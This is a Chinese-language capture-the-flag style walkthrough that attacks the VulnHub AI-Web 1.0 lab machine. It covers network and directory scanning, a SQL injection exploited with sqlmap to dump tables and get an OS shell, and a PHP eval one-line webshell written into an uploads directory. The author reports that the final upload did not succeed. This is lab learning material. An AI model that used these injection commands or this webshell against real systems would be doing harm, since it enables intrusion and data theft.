目录
站点信息收集
c段扫描
端口扫描
目录扫描
漏洞利用
使用 burp 抓包
查询数据库名
查询数据库下的表
查询表中的字段名
查询字段中的数据
--os-shell
上传一句话木马
下载地址:https://download.vulnhub.com/aiweb/AI-Web-1.0.7z
我们从站点信息收集开始,到漏洞攻击,再通过多方法拿到shell,提权benw。
我们使用kali进行攻击,靶机是AI WEB 1.0
kali的IP:192.168.202.128(终端窗口输 ifconfig)
WEBAI1.0的IP:未知
站点信息收集
注意:要在root管理员权限下进行
c段扫描
使用arp-scan扫描
-l (扫描c段)
arp-scan -l
在这里我们可以分析靶机的IP是192.168.202.147
端口扫描
使用 nmap 扫描
nmap 192.168.202.147 -sT -v -T4
只发现了80端口
目录扫描
先访问一下网页
发现什么也没有
使用 dirsearch 扫描
dirsearch -u http://192.168.202.147/
尝试访问 robots.txt 里的内容
访问 /m3diNf0/ 发现不能正常访问
访问 /se3reTdir777/uploads/ ,发现无权限(这里出现了一点小错误,按理说应该是放回页面,可以用来后面获得shell之后上传一句话木马,非常抱歉,因为我也是刚开始渗透测试方向的学习,技术不是很成熟,等我解决了之后再回来修改、补充文章,不过放心,不影响后面获得shell的操作)
接着对 /m3diNf0/ 和 /se3reTdir777/uploads/ 进行扫描
dirsearch -u http://192.168.202.147/m3diNf0/
/se3reTdir777/uploads/没发现,在/m3diNf0/发现了info.php,访问info.php
http://192.168.202.147/m3diNf0/info.php
发现是phpinfo的页面
再扫描se3reTdir777
dirsearch什么也没扫出来,换dirb扫描
dirb "http://192.168.202.147/se3reTdir777/"
发现了一个 index.php ,访问它
http://192.168.202.147/se3reTdir777/index.php
发现是一个信息查询的页面,尝试sql注入,输入 1’
页面报错,存在sql注入漏洞
漏洞利用
使用 burp 抓包
POST /se3reTdir777/index.php HTTP/1.1
Host: 192.168.202.147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.202.147
Connection: close
Referer: http://192.168.202.147/se3reTdir777/index.php
Upgrade-Insecure-Requests: 1
uid=1%27&Operation=Submit这是抓到的包,注入点是uid=1%27&Operation=Submit
查询数据库名
使用sqlmap 注入
sqlmap -u "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs
发现了两个数据库:aiweb1 、 information_schema,以及数据库的版本大于5.6的信息
查询数据库下的表
-D 数据库名
sqlmap -u "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 --tables
得到了两个表名: user 、systemUser ,再通过-T 查询表中的字段名
查询表中的字段名
-T 表名
sqlmap -u "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user --columns
得到了3个字段 : firstName、 id、 lastName
查询字段中的数据
-C 字段名
sqlmap -u "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user -C id --dump
没有什么有用信息
--os-shell
level 指定数据库类型为mysql,级别为3
--os-shell执行条件:
- 网站必须是root权限
- 必须知道网站的绝对路径
- secure_file_priv无限制
sqlmap -u "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --level=3 --os-shell
这里选4 PHP
这里选2输入绝对路径
已经知道m3diNf0和se3reTdir777 两个目录,然后找绝对目录,返回刚才的info.php页面,按 CTRL + f,搜索 m3diNf0和se3reTdir777 这两个目录,se3reTdir777没发现,m3diNf0 如下图所示
由此可以得到绝对路径是: /home/www/html/web1x443290o2sdf92213/
还记得刚才我们找到一个可以上传文件的页面se3reTdir777/uploads/刚好符合 它的绝对目录为:
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
到这里我们就获得了对方的shell,已经算攻击靶机成功了
上传一句话木马进而提权
先用 vim 编辑模式写一个一句话木马
vim 1.php
进入 vim 编辑器后,按“i”键进入插入模式,输入
<?php @eval($_POST['1'])?>按“Esc”键退出插入模式,依次输入" :wq " 保存并退出 vim 编辑器
–file-write:去读取木马文件
–file-dest:后面加要存放文件的地址
sqlmap -u "http://192.168.202.147/se3reTdir777/index.php" --data "uid=1%27&Operation=Submit" --file-write "/home/kali/1.php" --file-dest "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php"
如果你们 dir 之后可以看到 一句话木马 1.php的话,就表示写入文件成功了。
这里我没有成功,就不继续了,因为我也是刚开始渗透测试方向的学习,技术不是很成熟,等我解决之后再回来,非常抱歉,感谢大家支持。
